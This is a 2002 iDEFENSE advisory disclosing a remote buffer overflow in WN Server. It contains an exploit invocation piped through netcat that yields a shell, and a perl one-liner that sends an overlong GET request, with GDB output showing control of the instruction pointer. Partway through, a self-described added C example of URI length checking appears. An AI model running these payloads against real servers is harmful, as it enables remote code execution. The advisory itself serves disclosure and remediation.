From: David Endler (dendler_at_idefense.com)
Date: Mon Sep 30 2002 - 09:09:59 CDT
-----BEGIN PGP SIGNED MESSAGE-----
iDEFENSE Security Advisory 09.30.2002
Buffer Overflow in WN Server
Versions 1.18.2 through 2.0.0 of John Franks’ WN Server application
are susceptible to remote exploitation of a buffer overflow that
could allow an attacker to execute arbitrary code under the privileges of
the targeted server. Exploitation is possible by issuing WN Server a
long GET request. In order to successfully exploit this
vulnerability, customized shell code is required to bypass the
character filtering that WN Server imposes on the requested URI.
"WN is a Web server which runs on a wide variety of UNIX platforms
and is freely available at no cost for any use under the terms of the
GNU General Public License." It is included in the latest FreeBSD
ports collection as well.
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
has assigned the identification number CAN-2002-1166 to this issue.
The following is a snapshot of an exploit at
$ (./wn_bof 0 3; cat) | nc target 80
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
Exploitation of a buffer overflow usually results in one of two
things: the targeted host process/application/host crashes, or
arbitrary code executes. Both have serious repercussions, but in most
cases code execution is more threatening in that it could allow for
the further usurpation of higher-level privileges on the targeted
wn-1.18.2 - wn-2.0.0, which is included in the current version of the
FreeBSD Project’s FreeBSD ports collection, is vulnerable. Take the
following steps to determine whether a specific WN implementation is
1. Ensure that WN is running and open two terminals.
2. In the first terminal execute:
$ (perl -e 'print "GET /" . "a"x1600';cat)|nc localhost 80
3. In the second terminal, determine the process ID of the child that
was spawned to handle the previous command, and attach GDB to it:
# ps ax | grep swn
4223 ?? Ss 0:00.29 ./swn
4711 ?? S 0:00.01 ./swn
# gdb ./swn 4711
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
4. In the second terminal, type 'c' telling GDB to continue.
5. In the first terminal, press enter. If at this point the following
output is returned from GDB, then a vulnerable WN implementation is
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
WN Server 2.4.4 is available at
http://hopf.math.nwu.edu/wn-2.4.4.tar.gz. Users should strongly
consider deploying the latest version.
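The detection steps above trigger the overflow with a 1600-byte URI in a GET request. The following is an added example, not code from WN or from the advisory, of a request-line handler that checks the URI length before copying; the function name, status codes and the 256-byte buffer are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum parse_status { REQ_OK = 0, REQ_BAD = 400, REQ_URI_TOO_LONG = 414 };

/* Hypothetical helper (not WN source): copy the URI of "GET <uri>[ HTTP/x.y]"
 * into out[cap]. The length is checked before any byte is copied, so an
 * oversized URI is rejected rather than written past the end of out. */
enum parse_status parse_get_uri(const char *line, size_t len,
                                char *out, size_t cap)
{
    static const char method[] = "GET ";
    const size_t mlen = sizeof(method) - 1;
    const char *uri, *end;
    size_t ulen;

    if (line == NULL || out == NULL || cap == 0)
        return REQ_BAD;
    out[0] = '\0';
    if (len <= mlen || memcmp(line, method, mlen) != 0)
        return REQ_BAD;

    /* The URI runs to the next space, CR or LF, or to the end of input. */
    uri = end = line + mlen;
    while (end < line + len && *end != ' ' && *end != '\r' && *end != '\n')
        end++;
    ulen = (size_t)(end - uri);

    if (ulen == 0 || uri[0] != '/')
        return REQ_BAD;
    if (ulen >= cap)                 /* keep one byte for the terminator */
        return REQ_URI_TOO_LONG;

    memcpy(out, uri, ulen);
    out[ulen] = '\0';
    return REQ_OK;
}

int main(void)
{
    /* Constructed input: same shape as the detection request in step 2. */
    char req[5 + 1600 + 1], uri[256];
    memcpy(req, "GET /", 5);
    memset(req + 5, 'a', 1600);
    req[sizeof req - 1] = '\n';
    printf("%d\n", parse_get_uri(req, sizeof req, uri, sizeof uri));
    return 0;
}
```

The oversized request is answered with a 414-style status and the output buffer is left as an empty string, while a normal request line yields its URI unchanged.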
8/29/2002 Disclosed to iDEFENSE
9/24/2002 Disclosed to vendor John Franks
9/24/2002 Disclosed to iDEFENSE Clients
9/25/2002 Vendor Response
9/30/2002 Public Disclosure
This issue was exclusively disclosed to iDEFENSE by badc0ded
Get paid for security research
David Endler, CISSP
Director, Technical Intelligence
14151 Newbrook Drive
Chantilly, VA 20151
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
-----END PGP SIGNATURE-----